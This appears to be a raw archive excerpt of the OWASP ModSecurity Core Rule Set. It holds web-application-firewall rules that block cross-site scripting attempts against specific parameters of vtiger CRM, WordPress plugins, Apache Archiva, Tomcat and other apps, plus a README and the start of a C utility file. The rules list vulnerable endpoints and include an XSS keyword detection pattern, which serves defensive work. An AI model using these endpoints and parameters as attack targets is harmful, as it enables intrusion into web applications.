"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012706,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS vtiger CRM service parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:service/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vtiger CRM service parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012722) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability SecRule REQUEST_LINE "@contains /plugins/socialgrid/static/js/inline-admin.js.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012722,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:default_services/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SocialGrid Plugin default_services Cross-Site Scripting Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012797) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebAuction lang parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /lib/jscalendar/test.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012797,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WebAuction lang parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebAuction lang parameter Cross Site Scripting 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012946) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/inline-gallery/browser/browser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012946,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46781'" SecRule &TX:'/XSS.*ARGS:do/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress inline-gallery do parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nakid CMS CKEditorFuncNum parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /addons/kcfinder/browse.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012992,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Nakid CMS CKEditorFuncNum parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:CKEditorFuncNum/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nakid CMS CKEditorFuncNum parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013085) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BLOG CMS nsextt parameter Cross Site Scripting Vulnerability SecRule REQUEST_LINE "@contains /templates/admin_default/confirm.tpl.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013085,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS BLOG CMS nsextt parameter Cross Site Scripting Vulnerability',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:nsextt/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BLOG CMS nsextt parameter Cross Site Scripting Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013086) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBulletin sortorder parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /xperience.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013086,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS vBulletin sortorder parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:sortorder/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBulletin sortorder parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive useredit script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/security/useredit.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013099,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive useredit script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive useredit script Cross Site Scripting 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013100) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive roleedit script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/security/roleedit.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013100,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive roleedit script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive roleedit script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013101) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive userlist script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/security/userlist!show.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013101,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive userlist script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:roleName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive userlist script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013102) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive deleteArtifact script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/deleteArtifact!doDelete.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013102,rev:2,msg:'SLR: ET 
WEB_SPECIFIC_APPS Apache Archive deleteArtifact script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:groupId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive deleteArtifact script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013103) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/addLegacyArtifactPath!commit.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013103,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:legacyArtifactPath.path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013104) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive deleteNetworkProxy script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/deleteNetworkProxy!confirm.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013104,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive deleteNetworkProxy script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:proxyid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive deleteNetworkProxy script Cross Site Scripting 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013105) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive addRepository script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/addRepository.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013105,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive addRepository script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:repository.id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive addRepository script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013106) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive confirmDeleteRepository script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/confirmDeleteRepository.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013106,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive confirmDeleteRepository script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:repoid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive confirmDeleteRepository script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013107) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive editAppearance script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/editAppearance.action" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013107,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive editAppearance script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:organisationName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive editAppearance script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013108) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath.action Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/addLegacyArtifactPath.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013108,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath.action Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:legacyArtifactPath.path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive addLegacyArtifactPath.action Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013109) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive addNetworkProxy script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/addNetworkProxy.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013109,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive addNetworkProxy script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:proxy.id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive addNetworkProxy script 
Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013110) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive networkProxies script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/networkProxies.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013110,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive networkProxies script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:proxy.id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive networkProxies script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013111) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive legacyArtifactPath script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/legacyArtifactPath.action" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013111,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive legacyArtifactPath script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:legacyArtifactPath.path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive legacyArtifactPath script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013112) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Archive configureAppearance script Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /archiva/admin/configureAppearance.action" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013112,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Archive configureAppearance script Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:organisationName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Archive configureAppearance script Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013117) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Tomcat Sort Paramter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /sessions" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013117,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Tomcat Sort Paramter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-4172'" SecRule &TX:'/XSS.*ARGS:sort/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Tomcat Sort Paramter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013118) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Tomcat Orderby Paramter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /sessions" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013118,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Tomcat Orderby Paramter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-4172'" SecRule ARGS_NAMES "(?i:path)" "chain" SecRule QUERY_STRING|REQUEST_BODY "@contains orderby=" "chain" SecRule QUERY_STRING|REQUEST_BODY 
"(?i:orderby\x3D.+(alert|script|onmouse|onkey|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Tomcat Orderby Paramter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013133) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBulletin vBTube vidid Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /vBTube.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013133,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS vBulletin vBTube vidid Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:vidid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBulletin vBTube vidid Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013134) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBulletin vBTube uname Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /vBTube.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013134,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS vBulletin vBTube uname Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:uname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBulletin vBTube uname Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013226) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Immophp secteur parameter Cross Site Scripting Attempt SecRule 
REQUEST_LINE "@contains /annonce.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013226,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Immophp secteur parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,48341'" SecRule &TX:'/XSS.*ARGS:secteur/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Immophp secteur parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013310) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013310,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:title/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress PHP Speedy Plugin title parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-templates.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013425,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:eshoptemplate/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS Wordpress eShop plugin eshoptemplate parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-orders.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:action/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin action parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains page=eshop-orders.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:viewemail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress eShop plugin viewemail parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2013434) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tiki Wiki CMS ajax parameter XSS Vulnerability SecRule REQUEST_LINE "@contains /snarf_ajax.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013434,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Tiki Wiki CMS ajax parameter XSS Vulnerability',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:ajax/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tiki Wiki CMS ajax parameter XSS Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_XSS_RULES ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/������������������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0021501�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/README������������������������������������������������0000664�0000000�0000000�00000000161�12164572564�0022357�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������
The util directory contains many supporting tools/scripts that may be used with the OWASP ModSecurity CRS files. ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0023705�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/������������������������������������0000775�0000000�0000000�00000000000�12164572564�0024740�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/av-scanning/runAV/common.c����������������������������0000775�0000000�0000000�00000043617�12164572564�0026412�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������
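������������������������������������������������
#include "common.h"

/*
 * Shared helpers for the runAV / modsec RPC utilities: file locking, request
 * and error logging, config-file and query-string parsing, and a small TCP
 * client.  Types (parameter_t, blocklist_t), limits (MAX_NAME_LENGTH,
 * MAX_VALUE_LENGTH, MAX_PARAMS), DEBUG and the modsec_* globals are declared
 * outside this file (presumably in common.h).
 */

/* Fill buf with the ctime_r() timestamp of "now", without the trailing
 * newline.  buf must hold at least 26 bytes; it is left empty on failure. */
static void log_timestamp(char *buf)
{
    time_t now;
    size_t len;

    buf[0] = '\0';
    time(&now);
    if (!ctime_r(&now, buf))
        buf[0] = '\0';
    len = strlen(buf);
    if (len && buf[len - 1] == '\n')
        buf[len - 1] = '\0';
}

/*
 * Open (creating if needed) `filename` and take an exclusive flock() on it.
 * Returns the locked descriptor, or -1 on a NULL name, open failure or lock
 * failure.  The caller releases the lock with unlock_file().
 */
int lock_file(char *filename)
{
    int fd, saved_errno;

    if (!filename)
        return -1;
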